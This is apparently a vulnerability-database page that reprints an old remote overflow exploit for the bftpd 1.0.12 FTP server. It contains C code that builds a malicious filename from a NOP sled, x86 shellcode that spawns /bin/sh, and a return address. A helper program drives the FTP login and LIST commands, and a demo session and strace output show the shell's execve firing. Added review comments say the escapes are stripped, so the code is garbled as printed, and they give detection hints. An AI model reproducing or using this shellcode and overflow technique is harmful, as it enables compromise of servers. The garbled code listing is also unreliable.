BFTPd 1.0.12 – Remote Overflow
漏洞ID | 1053501 | 漏洞类型 | |
发布时间 | 2000-12-11 | 更新时间 | 2000-12-11 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Creates a filename to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory.
Coded by korty <[email protected]>
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#define LEN 205
/*
 * Entry point of the proof-of-concept generator.
 *
 * NOTE(review): the string and character escapes in this listing have lost
 * their backslashes (e.g. "xebx29", 'x90', "%#010xn"), an extraction
 * artifact; as printed the program does not build what the comments
 * describe.  Read it as a description of the vulnerability class, not as a
 * buildable program.
 *
 * What the visible code does: fill a LEN+12 byte buffer with a filler byte,
 * place the `code` bytes at the end of the first LEN bytes, append `ret`
 * twice as machine-word integers plus a zero word, and then create a file
 * whose *name* is that buffer.  The overflow itself is server-side: per the
 * page title and the strace transcript below, bftpd 1.0.12 overruns a
 * buffer while building the directory-listing line for such a name (the
 * sent line is 270 bytes, and an execve follows).  Presumably a stack buffer
 * (0xbffffa80 is in the usual Linux/x86 stack range of that era) -- not
 * confirmed by this page.  This program never talks to the server.
 *
 * Defensive notes: the page gives no fixed bftpd version, so upgrading to a
 * current release is the mitigation to verify.  For detection, a directory
 * entry whose name is ~200+ bytes and contains non-printable bytes, or a
 * LIST reply line far longer than normal (270 bytes here), is a strong
 * anomaly indicator in FTP server logs or captures.
 */
int main (int argc, char **argv)
{
char buf[LEN + 12]; /* LEN bytes of filler + payload, then three int writes (12 bytes assuming 4-byte int) */
int ret = 0xbffffa80; /* base address placed into the name; argv[1] adds an unvalidated atoi() offset */
int *p; /* write cursor for the trailing int words */
int fp; /* a file descriptor from open(), not a FILE*, despite the name */
char code[]=
/*
* Linux/x86
*
* toupper() evasion, standard execve() /bin/sh (used eg. in various
* imapd exploits). Goes through a loop adding 0x20 to the
* (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
*/
/* main: */
"xebx29" /* jmp callz */
/* start: */
"x5e" /* popl %esi */
"x29xc9" /* subl %ecx, %ecx */
"x89xf3" /* movl %esi, %ebx */
"x89x5ex08" /* movl %ebx, 0x08(%esi) */
"xb1x07" /* movb $0x07, %cl */
/* loopz: */
"x80x03x20" /* addb $0x20, (%ebx) */
"x43" /* incl %ebx */
"xe0xfa" /* loopne loopz */
"x29xc0" /* subl %eax, %eax */
"x88x46x07" /* movb %al, 0x07(%esi) */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"xb0x0b" /* movb $0x0b, %al */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx08" /* leal 0x08(%ebx), %ecx */
"x8dx53x0c" /* leal 0x0c(%ebx), %edx */
"xcdx80" /* int $0x80 */
"x29xc0" /* subl %eax, %eax */
"x40" /* incl %eax */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8xd2xffxffxff" /* call start */
"x0fx42x49x4ex0fx53x48"; /* /bin/sh -= 0x20 */
/* Optional offset: atoi() reports no error, so a non-numeric argument is silently 0. */
if (argc > 1) {
ret += atoi(argv[1]);
fprintf(stderr, "Using ret %#010xn", ret); /* as printed the format has lost its "\n" escape */
}
/* 'x90' as printed is a multi-character constant (implementation-defined value);
 * memset() stores only its low byte into the first LEN bytes. */
memset(buf, 'x90', LEN);
/* Copy `code` so that it ends exactly at offset LEN (strlen() evaluated twice; a style nit). */
memcpy(buf + LEN - strlen(code), code, strlen(code));
/* LEN (205) is not a multiple of 4, so these int stores are misaligned --
 * tolerated on x86, undefined behavior in strict C. */
p = (int *) (buf + LEN);
*p++ = ret;
*p++ = ret;
*p = 0; /* zero word doubles as the name's NUL terminator */
/* O_CREAT requires a third `mode` argument; none is passed, so the permission
 * bits are whatever garbage open() reads from the stack (the strace below shows
 * the resulting file with S_ISUID|0544, consistent with that).  The access mode
 * is O_RDONLY (0) since no O_WRONLY/O_RDWR flag is given. */
fp = open(buf, O_CREAT);
if(fp < 0) perror("buf"); /* on failure fp is -1 and the close() below just returns EBADF */
close(fp); /* close() is declared in <unistd.h>, which this file does not include */
/* No return statement: exit status is 0 under C99+, unspecified under C89. */
}
/*
-- BEGIN list.c --
#include <stdio.h>
int main()
{
#define USER "cb"
#define PASS "PasSwoRd"
#define PORT "port 127,0,0,1,4,4" // Data on the port 1028 with the addr 127.0.0.1
#define CWD "cwd longfile"
#define LIST "list"
printf("user %sn", USER);
sleep(1);
printf("pass %sn", PASS);
sleep(1);
printf("%sn", PORT);
sleep(1);
printf("%sn", CWD);
sleep(1);
printf("%sn", LIST);
}
-- END list.c --
A) DEMO
tshaw:~/longfile$ gcc -o exploit exploit.c
tshaw:~/longfile$ ls
exploit* exploit.c list.c
tshaw:~/longfile$ ls
exploit* exploit.c list.c
tshaw:~/longfile$ ./exploit
tshaw:~/longfile$ ls
exploit*
exploit.c
list.c
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220313)^)311211323211^b221a200 03 C
300332)300210Fa211Ff220v203323211Kb211Sf311200)300@311200310322333
333333 13BIN 13SH200332333233200332333233*
tshaw:~/longfile$
tshaw:~/longfile$ gcc -o list list.c
tshaw:~/longfile$ nc -l -p 1028 &
[1] 29973
tshaw:~/longfile$
tshaw:~/longfile$ (./list ; cat) | nc localhost 21
220 bftpd 1.0.12 at 127.0.0.1 ready.
331 Password please.
230 User logged in.
200 PORT 127.0.0.1:1028 OK
250 OK
150 Data connection established.
drwxr-xr-x 2 1000 100 4096 Dec 8 04:06 .
drwxr-xr-x 55 1000 100 4096 Dec 8 04:02 ..
-rw-r--r-- 1 1000 100 323 Dec 8 04:06 list.c
-rwxr-xr-x 1 1000 100 11931 Dec 8 04:06 list
-rw-r--r-- 1 1000 100 2178 Dec 8 03:54 exploit.c
-rwxr-xr-x 1 1000 100 12861 Dec 8 03:56 exploit
-r-xr--r-- 1 1000 100 0 Dec 8 03:56 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱?^)??? C猩)핂F덯
?
뉡뜊S
?)??脘BINSH????
[1]+ Done nc -l -p 1028
tshaw:~/longfile$
B) STRACE OUTPUT
tshaw:~# ps -aef |grep bftpd
cb 30128 62 0 Dec04 ? 00:00:00 bftpd
root 30136 30024 0 Dec04 ttyqa 00:00:00 grep bftpd
tshaw:~# strace -p 30128
read(0, "n", 4096) = 1
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
write(2, "150 Data connection established."..., 34) = 34
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open(".", O_RDONLY|O_NONBLOCK|0x10000) = 5
fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
fcntl(5, F_SETFD, FD_CLOEXEC) = 0
brk(0x8052000) = 0x8052000
getdents(5, /* 7 entries */, 3933) = 328
stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x 2 1000 100 "..., 58, 0) = 58
stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x 55 1000 100 "..., 59, 0) = 59
stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
send(4, "-rw-r--r-- 1 1000 100 "..., 63, 0) = 63
stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
send(4, "-rwxr-xr-x 1 1000 100 "..., 61, 0) = 61
stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
send(4, "-rw-r--r-- 1 1000 100 "..., 66, 0) = 66
stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
send(4, "-rwxr-xr-x 1 1000 100 "..., 64, 0) = 64
stat("./릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱먮)^)??? C猩)핂F덯
?
뉡뜊S
?)??脘BINSH????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
send(4, "-r-xr--r-- 1 1000 100 "..., 270, 0) = 270
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
_exit(-1073743151) = ?
tshaw:~#
*/
// milw0rm.com [2000-12-11]